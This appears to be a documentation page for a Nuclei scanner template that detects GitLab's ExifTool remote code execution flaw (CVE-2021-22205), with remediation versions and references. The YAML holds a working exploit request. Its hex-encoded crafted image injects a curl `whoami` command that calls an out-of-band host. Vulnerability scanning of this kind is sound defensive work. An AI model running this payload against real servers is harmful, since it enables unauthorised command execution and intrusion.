GitLab CE/EE Unauthenticated RCE Using ExifTool
ID: gitlab-rce
Severity: critical
Author: pdteam
Tags: oast,intrusive,hackerone,cve,cve2021,gitlab,rce,kev
Description
Section titled “Description”GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2.
YAML Source
Section titled “YAML Source”id: gitlab-rce
info: name: GitLab CE/EE Unauthenticated RCE Using ExifTool author: pdteam severity: critical description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2. remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher. reference: - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://hackerone.com/reports/1154542 - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: CWE-20 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* metadata: max-request: 2 shodan-query: http.title:"GitLab" product: gitlab vendor: gitlab tags: oast,intrusive,hackerone,cve,cve2021,gitlab,rce,kev
http: - raw: - | GET /users/sign_in HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - | POST /uploads/user HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
max-redirects: 3
matchers-condition: and matchers: - type: word words: - 'Failed to process image'
- type: status status: - 422
extractors: - type: regex name: csrf-token internal: true group: 1 regex: - 'csrf-token" content="(.*?)" />'
- type: regex part: interactsh_request group: 1 regex: - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'# digest: 4a0a0047304502204558784ade0a5d11b2f64a3b562a09baf59011b58a8cf266e386f4f588d8486b022100edeb6c13ab39af8f6933f5d6851e6be18b31a426c939e2fdb419b4df4e2fdfa5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/gitlab/gitlab-rce.yaml"